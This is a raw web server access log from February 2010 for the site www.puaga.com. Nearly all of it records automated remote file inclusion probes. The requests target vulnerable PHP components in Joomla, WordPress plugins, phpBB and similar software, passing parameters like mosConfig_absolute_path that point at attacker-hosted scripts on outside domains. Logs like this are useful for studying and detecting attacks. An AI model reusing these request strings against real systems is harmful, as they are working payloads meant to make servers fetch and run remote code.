122.252.1.109 - - [08/Feb/2010:08:01:19 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [08/Feb/2010:08:01:19 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [08/Feb/2010:08:01:46 -0800] "GET /logs/index.php?pagina=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [08/Feb/2010:08:01:46 -0800] "GET /logs/access_100107.log/index.php?pagina=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [08/Feb/2010:08:01:46 -0800] "GET /index.php?pagina=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:08:02:14 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:08:02:14 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:08:02:14 -0800] "GET /logs/access_100104.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:08:02:15 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:08:02:15 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:08:02:15 -0800] "GET /logs/access_100104.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [08/Feb/2010:08:02:27 -0800] "GET /logs/access_100105.log/index.php?pagina=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:08:02:30 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:08:02:30 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:08:02:32 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:08:02:32 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:08:02:32 -0800] "GET /logs/access_100104.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:08:02:33 -0800] "GET /logs/access_100104.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:08:02:35 -0800] "GET /logs/access_100103.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:08:02:37 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:08:02:37 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:08:02:37 -0800] "GET /logs/access_100104.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:08:02:40 -0800] "GET /logs/access_100103.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:08:02:41 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:08:02:41 -0800] "GET /logs/access_100125.log%20%20//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:08:02:41 -0800] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:08:02:42 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:08:02:42 -0800] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:08:02:42 -0800] "GET /logs/access_100125.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:08:02:42 -0800] "GET /logs/access_100103.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [08/Feb/2010:08:02:43 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://eguruji.net/modlogan/daily_usage_200904.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [08/Feb/2010:08:02:43 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://eguruji.net/modlogan/daily_usage_200904.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:08:02:44 -0800] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:08:02:44 -0800] "GET /logs/access_100125.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:08:02:44 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [08/Feb/2010:08:02:45 -0800] "GET /logs/access_100123.log//newspublish/include.php?path%5Bdocroot%5D=http://eguruji.net/modlogan/daily_usage_200904.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.1.150.2 - - [08/Feb/2010:08:02:45 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.1.150.2 - - [08/Feb/2010:08:02:45 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.1.150.2 - - [08/Feb/2010:08:02:45 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.1.150.2 - - [08/Feb/2010:08:02:55 -0800] "GET /logs/access_100111.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:08:03:16 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:08:03:16 -0800] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:08:03:16 -0800] "GET /logs/access_100125.log%20%20//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:08:03:34 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:08:03:34 -0800] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:08:03:34 -0800] "GET /logs/access_100125.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:08:03:41 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:08:03:41 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:08:03:41 -0800] "GET /logs/access_100104.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:08:03:50 -0800] "GET /logs/access_100123.log%20%20//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:08:04:07 -0800] "GET /logs/access_100123.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:08:04:13 -0800] "GET /logs/access_100109.log%20%20//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:08:04:43 -0800] "GET /logs/access_100103.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.1.150.2 - - [08/Feb/2010:08:05:02 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:08:05:59 -0800] "GET /logs/access_100110.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [08/Feb/2010:08:06:07 -0800] "GET /logs/access_100107.log///vwar/backup/errors.php?error=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [08/Feb/2010:08:06:10 -0800] "GET /logs///vwar/backup/errors.php?error=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [08/Feb/2010:08:06:10 -0800] "GET //vwar/backup/errors.php?error=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.1.150.2 - - [08/Feb/2010:08:06:10 -0800] "GET /logs/access_100104.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [08/Feb/2010:08:06:29 -0800] "GET /logs/access_100122.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [08/Feb/2010:08:06:31 -0800] "GET /logs/access_100122.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:08:06:47 -0800] "GET /logs/access_100104.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:08:06:47 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:08:06:47 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:08:06:59 -0800] "GET /logs/access_100104.log//index.php?load=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:08:06:59 -0800] "GET /logs//index.php?load=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:08:07:00 -0800] "GET /index.php?load=http://neokult.com/img/open.jpg??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:08:07:14 -0800] "GET /logs/?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:08:07:14 -0800] "GET /?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [08/Feb/2010:08:07:18 -0800] "GET /logs/access_100122.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.193.10.130 - - [08/Feb/2010:08:07:19 -0800] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://rkparadiseacademy.org/cp/scripts/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.193.10.130 - - [08/Feb/2010:08:07:19 -0800] "GET /logs/access_100112.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://rkparadiseacademy.org/cp/scripts/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.193.10.130 - - [08/Feb/2010:08:07:19 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://rkparadiseacademy.org/cp/scripts/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.193.10.130 - - [08/Feb/2010:08:07:24 -0800] "GET /logs/access_100108.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://rkparadiseacademy.org/cp/scripts/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:08:07:29 -0800] "GET /logs/access_100111.log%20%20/?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:08:07:43 -0800] "GET /logs/access_100103.log%20%20/?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:08:07:51 -0800] "GET /logs/?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:08:07:51 -0800] "GET /?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:08:08:00 -0800] "GET /logs/access_100111.log%20%20/?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:08:08:12 -0800] "GET /logs/access_100103.log%20%20/?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.193.10.130 - - [08/Feb/2010:08:08:46 -0800] "GET /logs/access_100112.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://rkparadiseacademy.org/cp/scripts/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.193.10.130 - - [08/Feb/2010:08:08:46 -0800] "GET /logs/access_100108.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://rkparadiseacademy.org/cp/scripts/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [08/Feb/2010:08:09:22 -0800] "GET /logs/access_100105.log///vwar/backup/errors.php?error=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:08:10:47 -0800] "GET /logs/access_100201.log//includes/mx_functions_ch.php?phpbb_root_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:08:10:47 -0800] "GET /logs//includes/mx_functions_ch.php?phpbb_root_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:08:11:09 -0800] "GET /includes/mx_functions_ch.php?phpbb_root_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:08:11:09 -0800] "GET /logs/access_100201.log%20%20//includes/mx_functions_ch.php?phpbb_root_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:08:11:09 -0800] "GET /logs//includes/mx_functions_ch.php?phpbb_root_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:08:11:17 -0800] "GET /htmltonuke.php?filnavn=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:08:11:17 -0800] "GET /logs/access_100103.log%20%20/htmltonuke.php?filnavn=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:08:11:17 -0800] "GET /logs/htmltonuke.php?filnavn=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.138.32.230 - - [08/Feb/2010:08:11:25 -0800] "GET /logs/access_100122.log%20%20///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://igedermateryal.org/gelendosyalar/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.138.32.230 - - [08/Feb/2010:08:11:25 -0800] "GET /logs///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://igedermateryal.org/gelendosyalar/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.138.32.230 - - [08/Feb/2010:08:11:26 -0800] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://igedermateryal.org/gelendosyalar/idxx.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:08:11:35 -0800] "GET /logs/access_100115.log%20%20/htmltonuke.php?filnavn=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [08/Feb/2010:08:11:39 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [08/Feb/2010:08:11:39 -0800] "GET /logs/access_100107.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [08/Feb/2010:08:11:39 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:08:12:01 -0800] "GET /logs/access_100112.log%20%20//includes/mx_functions_ch.php?phpbb_root_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [08/Feb/2010:08:12:02 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.138.32.230 - - [08/Feb/2010:08:12:10 -0800] "GET /logs/access_100129.log%20%20///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://igedermateryal.org/gelendosyalar/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [08/Feb/2010:08:12:16 -0800] "GET /logs/access_100107.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [08/Feb/2010:08:12:16 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [08/Feb/2010:08:12:17 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [08/Feb/2010:08:13:08 -0800] "GET /logs/access_100103.log%20%20//skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [08/Feb/2010:08:13:08 -0800] "GET /skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [08/Feb/2010:08:13:08 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [08/Feb/2010:08:13:16 -0800] "GET /logs/access_100123.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://eguruji.net/modlogan/daily_usage_200904.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:08:13:54 -0800] "GET /include/init.inc.php?CPG_M_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
